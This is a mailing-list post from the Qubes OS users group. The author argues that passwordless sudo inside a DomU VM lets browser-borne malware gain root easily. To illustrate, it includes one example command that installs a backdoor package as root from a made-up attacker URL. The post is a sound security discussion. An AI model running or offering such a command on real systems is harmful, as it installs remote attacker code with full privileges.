Im sure this has been kicked into a pulp (considering the threads and the text in the sudoers files) but I am still perturbed by the argument that allowing unrestricted sudo to root in a DomU VM is "safe" and there is "no benefit" to disallowing it. Perhaps I am misunderstanding something, I have only installed and begun to pull the system apart today, so bear with me.
Hypothetical (only sort of): -Non-disposable VM used for personal email gets phishing attack. Or maybe its code embedded in that kitten wrapped in bacon jpeg. -Phishing attack (oops) succeeds due to users uncontrollable nature to *click*. -Attack actually exploits a browser bug executing code. Nothing new. -Code modifies /usr/bin/audacious or any number of scenarios because it, for all intent and purpose, has root without even having to perform an exploit. All it has to do is sudo or su -. This code could do something as comical as: sudo dnf install https://i.ownz.uk/muhbackdoorz.rpm I am having an extremely difficult time seeing how this is not an issue. Now keep in mind I am somewhat joking above. No, I would not click on the phishing link but this in no way negates the example. Also I realize that this DomU compromise only compromises it and not the entire system pending a VM escape attack. How do you deal with this potential scenario? This part of the file system is not rewritten on every boot. Are you constantly somehow verifying your VM every boot, every 5 minutes, every web page load? Or are you restoring from a backup every boot or worse rebuilding the entire VM from a template every time you need it? Do you just not care that this VM could be under nefarious control and let the perpetrator read your email etc? What am I missing here that negates the above situation not being far more trivial to perform and dangerous due to the fact there is no locks between "user@domU" and its companion root account? Anyhow, the concepts Qubes OS is employing are very cool and overall the system seems very well designed to be functional. Great work. But the above item very much has me concerned. Side note, something like SELinux could add further benefits within both Dom0 and DomU but that is a whole new can of worms. ie: policy that disallows the browser from ever executing code capable of this. -- You received this message because you are subscribed to the Google Groups "qubes-users" group. To unsubscribe from this group and stop receiving emails from it, send an email to qubes-users+unsubscr...@googlegroups.com. To post to this group, send email to qubes-users@googlegroups.com. To view this discussion on the web visit https://groups.google.com/d/msgid/qubes-users/ec32eeb2-2aa5-488a-b480-ae127207cd78%40googlegroups.com. For more options, visit https://groups.google.com/d/optout.
